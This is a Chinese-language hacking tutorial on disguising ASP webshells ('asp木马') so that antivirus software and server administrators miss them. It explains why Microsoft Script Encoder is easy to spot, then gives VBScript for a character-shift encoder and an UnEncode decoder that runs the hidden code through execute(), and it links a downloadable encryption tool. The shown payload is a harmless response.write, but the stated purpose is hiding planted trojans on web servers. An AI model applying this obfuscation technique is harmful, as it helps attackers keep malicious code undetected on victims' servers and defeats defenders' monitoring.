记得当年asp木马出来的时候号称“永不被杀的木马”,呵呵,时至今日,随便什么杀毒软件都能将其杀得片甲不留^_^呵呵,受到木马换壳躲避杀毒软件思路影响,我们也可以给asp木马“加壳”(呵呵,当然不是用UPX等)。还等什么?请往下看。
其实这个思路很简单,就是把asp代码编码,执行时再解码。这里有两个方法,一是用微软的工具Script Encoder;二是利用asp的execute函数。
先说说Script Encoder。这个东东可以在微软官方网站免费下到,而且还附赠详细使用说明,这里就不多说了吧。但是经过它加密后的文件会有
<%@ LANGUAGE = VBScript.Encode %>
呵呵,露马脚了,管理员看到这句话就知道这个asp文件被加密了。那怎么解密呢?现在知道了吧,微软的Script Encoder不保险,所以呢,我们要自己写一个程序出来“加壳”。
asp的execute函数是拿来执行字符串的,即是说可以把asp语句写成字符串,然后用execute来执行。比如这行代码:
execute("response.write(""hackerXfiles"")")
执行后的效果等同于执行
response.write("hackerXfiles")
这里由于execute函数里的东东是字符串,故遇到引号要双写。呵呵,既然execute里是字符串,那么我们就可以把里面的东东拿来加密了。
给大家提供一个VB的加密解密程序
点击下载VB版的ASP加密解密程序ASPJM.rar
怎么加密呢?呵呵,就用最简单的移位法好了。请看ASP加密代码:
but=1
cc=replace(nr,vbcrlf,"狼")
for i= 1 to len(cc)
if mid(cc,i,1)<>"狼" then
pk=asc(mid(cc,i,1))+but
if pk>126 then
pk=pk-95
elseif pk<32 then
pk=pk+95
end if
temp=temp&chr(pk)
else
temp=temp&"狼"
end if
next
temp=replace(temp,"""","""""")
response.write(temp)
这段代码就是asp下的循环移位法。那个变量but就是移位的位数,可修改。呵呵,怎么叫循环呢?因为程序会比较字符的ascii码,当大于126或者小于32时就会处理,使范围在32~126之间。因为这样可以避免出现windows不能显示的字符。这也是一开始就把回车换行符替换掉的原因。
那就让我们来看看用上面代码把
response.write("hackerXfiles")
加密后的结果:“sftqpotf/xsjuf)#ibdlfsYgjmft#*”,嘿嘿,这回神仙也看不懂了吧^_^
既然加了密,当然要解密啦,看ASP解密代码:
function UnEncode(temp)
but=1 '这个是移位法所移的位数!注意修改此处与加密时使用的一致
for i =1 to len(temp)
if mid(temp,i,1)<>"狼" then
pk=asc(mid(temp,i,1))-but
if pk>126 then
pk=pk-95
elseif pk<32 then
pk=pk+95
end if
a=a&chr(pk)
else
a=a&vbcrlf
end if
next
UnEncode=a
end function
呵呵,现在知道怎么执行了吧,只需调用这个解密函数就是:
execute(UnEncode("sftqpotf/xsjuf)#ibdlfsYgjmft#*"))
怎么样,是不是顺利执行了!